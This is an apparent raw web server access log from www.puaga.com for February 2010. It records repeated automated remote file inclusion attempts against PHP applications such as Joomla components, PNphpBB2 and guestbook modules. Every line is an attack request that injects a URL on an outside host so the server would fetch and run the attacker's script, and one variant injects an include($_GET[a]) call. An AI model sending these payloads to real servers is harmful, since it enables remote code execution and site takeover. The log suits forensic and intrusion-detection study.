114.108.128.160 - - [14/Feb/2010:04:00:16 -0800] "GET /logs/access_100117.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.108.128.160 - - [14/Feb/2010:04:00:16 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
114.108.128.160 - - [14/Feb/2010:04:00:16 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:04:00:57 -0800] "GET /e404.php?DOCUMENT_ROOT=http://www.targiopole.pl/auto/down/son1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:04:00:57 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.targiopole.pl/auto/down/son1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:04:00:57 -0800] "GET /logs/access_100112.log%20%20/e404.php?DOCUMENT_ROOT=http://www.targiopole.pl/auto/down/son1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:04:01:09 -0800] "GET /logs/access_100103.log%20%20/e404.php?DOCUMENT_ROOT=http://www.targiopole.pl/auto/down/son1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.108.128.160 - - [14/Feb/2010:04:01:35 -0800] "GET /logs/access_100107.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.108.128.160 - - [14/Feb/2010:04:01:50 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.108.128.160 - - [14/Feb/2010:04:01:50 -0800] "GET /logs/access_100117.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.108.128.160 - - [14/Feb/2010:04:01:51 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
114.108.128.160 - - [14/Feb/2010:04:01:53 -0800] "GET /logs/access_100107.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.68.232.77 - - [14/Feb/2010:04:02:12 -0800] "GET /logs/access_100109.log//errors.php?error=http://karaz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:04:02:35 -0800] "GET /logs/access_100118.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.68.232.77 - - [14/Feb/2010:04:02:40 -0800] "GET /logs/access_100119.log//errors.php?error=http://karaz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:04:02:42 -0800] "GET /logs/access_100204.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.108.128.160 - - [14/Feb/2010:04:03:17 -0800] "GET /logs/access_100107.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.155 - - [14/Feb/2010:04:03:26 -0800] "GET /logs/access_100115.log%20%20//amen/skin_board/a_standard///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.techedu.or.kr//bbs/data/board1/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [14/Feb/2010:04:03:28 -0800] "GET /logs/access_100112.log%20%20//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:04:07:11 -0800] "GET /logs/access_100118.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:04:07:27 -0800] "GET /logs/access_100115.log%20%20//amen/skin_board/a_standard///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.techedu.or.kr//bbs/data/board1/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:04:07:39 -0800] "GET /logs/access_100204.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [14/Feb/2010:04:08:21 -0800] "GET /logs/access_100115.log%20%20//amen/skin_board/a_standard///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.techedu.or.kr//bbs/data/board1/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:04:11:38 -0800] "GET /logs/access_100127.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.192.48.157 - - [14/Feb/2010:04:12:22 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://ea-flag.com/news/media/1/build.url??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.puaga.com"
67.192.48.157 - - [14/Feb/2010:04:12:22 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://ea-flag.com/news/media/1/build.url??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:04:14:30 -0800] "GET /logs/access_100127.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.199.140.158 - - [14/Feb/2010:04:14:43 -0800] "GET /logs/access_100111.log//error.php?dir=http://www.fbcoronado.com/1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.199.140.158 - - [14/Feb/2010:04:14:43 -0800] "GET /logs//error.php?dir=http://www.fbcoronado.com/1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.199.140.158 - - [14/Feb/2010:04:14:44 -0800] "GET /error.php?dir=http://www.fbcoronado.com/1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:04:14:47 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:04:14:47 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:04:14:47 -0800] "GET /logs/access_100124.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:04:14:57 -0800] "GET /logs/access_100124.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:04:14:57 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:04:14:58 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:04:14:59 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:04:15:00 -0800] "GET /logs/access_100124.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:04:15:02 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:04:15:41 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:04:15:43 -0800] "GET /logs/access_100124.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:04:15:44 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:04:15:56 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:04:15:56 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:04:16:00 -0800] "GET /logs/access_100124.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.199.140.158 - - [14/Feb/2010:04:16:17 -0800] "GET /logs/access_100109.log//error.php?dir=http://www.fbcoronado.com/1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:04:16:40 -0800] "GET /logs/access_100124.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:04:16:42 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.209.60 - - [14/Feb/2010:04:16:46 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [14/Feb/2010:04:17:06 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [14/Feb/2010:04:17:06 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [14/Feb/2010:04:17:06 -0800] "GET /logs/access_100116.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:04:17:48 -0800] "GET /logs/access_100126.log/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.targiopole.pl/auto/down/son1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:04:17:48 -0800] "GET /logs/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.targiopole.pl/auto/down/son1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:04:17:48 -0800] "GET /logs/access_100208.log/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.targiopole.pl/auto/down/son1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:04:17:48 -0800] "GET /components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.targiopole.pl/auto/down/son1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:04:17:50 -0800] "GET /logs/access_100126.log/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.targiopole.pl/auto/down/son1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:04:17:50 -0800] "GET /components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.targiopole.pl/auto/down/son1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:04:17:50 -0800] "GET /logs/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.targiopole.pl/auto/down/son1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:04:17:51 -0800] "GET /logs/access_100208.log/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.targiopole.pl/auto/down/son1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.184.217.50 - - [14/Feb/2010:04:18:15 -0800] "GET /logs/access_100105.log%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:04:19:35 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:04:19:35 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:04:19:35 -0800] "GET /logs/access.log%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:04:19:55 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:04:19:55 -0800] "GET /logs/access.log%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:04:19:55 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:04:19:56 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:04:19:57 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:04:19:57 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:04:20:01 -0800] "GET /logs/access.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:04:20:01 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:04:20:01 -0800] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:04:21:21 -0800] "GET /logs/access_100208.log%20%20/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.targiopole.pl/auto/down/son1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:04:21:21 -0800] "GET /logs/access_100126.log%20%20/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.targiopole.pl/auto/down/son1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:04:21:26 -0800] "GET /logs/access_100126.log%20%20/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.targiopole.pl/auto/down/son1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:04:21:26 -0800] "GET /logs/access_100208.log%20%20/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.targiopole.pl/auto/down/son1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:04:22:15 -0800] "GET /logs/access_100112.log%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [14/Feb/2010:04:22:44 -0800] "GET /logs/access_100112.log%20%20//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:04:24:16 -0800] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.targiopole.pl/auto/down/son1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:04:24:16 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.targiopole.pl/auto/down/son1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:04:24:16 -0800] "GET /logs/access_100125.log%20%20/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.targiopole.pl/auto/down/son1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [14/Feb/2010:04:25:50 -0800] "GET /logs/access_100111.log%20%20/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.targiopole.pl/auto/down/son1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [14/Feb/2010:04:25:59 -0800] "GET /logs/access_100116.log%20%20/lostpasswd.php?env[include_prefix]=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [14/Feb/2010:04:25:59 -0800] "GET /lostpasswd.php?env[include_prefix]=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [14/Feb/2010:04:25:59 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [14/Feb/2010:04:26:59 -0800] "GET /logs/access_100105.log%20%20/lostpasswd.php?env[include_prefix]=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.34.19 - - [14/Feb/2010:04:27:45 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.34.19 - - [14/Feb/2010:04:27:45 -0800] "GET /logs/access_100123.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.34.19 - - [14/Feb/2010:04:27:45 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [14/Feb/2010:04:27:53 -0800] "GET /include/admin.lib.inc.php?site_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [14/Feb/2010:04:27:53 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [14/Feb/2010:04:27:53 -0800] "GET /logs/access_100118.log%20%20//include/admin.lib.inc.php?site_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [14/Feb/2010:04:28:22 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [14/Feb/2010:04:28:22 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [14/Feb/2010:04:28:22 -0800] "GET /logs/access_100202.log//tools/send_reminders.php?noSet=0&includedir=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [14/Feb/2010:04:28:23 -0800] "GET /logs/access_100204.log%20%20//include/admin.lib.inc.php?site_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [14/Feb/2010:04:28:35 -0800] "GET /include/admin.lib.inc.php?site_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [14/Feb/2010:04:28:35 -0800] "GET /logs/access_100118.log%20%20//include/admin.lib.inc.php?site_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [14/Feb/2010:04:28:35 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.62.88.170 - - [14/Feb/2010:04:28:45 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.62.88.170 - - [14/Feb/2010:04:28:45 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [14/Feb/2010:04:28:46 -0800] "GET /include/admin.lib.inc.php?site_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [14/Feb/2010:04:28:46 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [14/Feb/2010:04:28:46 -0800] "GET /logs/access_100118.log%20%20//include/admin.lib.inc.php?site_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [14/Feb/2010:04:28:50 -0800] "GET /include/admin.lib.inc.php?site_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [14/Feb/2010:04:28:50 -0800] "GET /logs/access_100118.log%20%20//include/admin.lib.inc.php?site_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [14/Feb/2010:04:28:50 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [14/Feb/2010:04:28:51 -0800] "GET /include/admin.lib.inc.php?site_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [14/Feb/2010:04:28:51 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
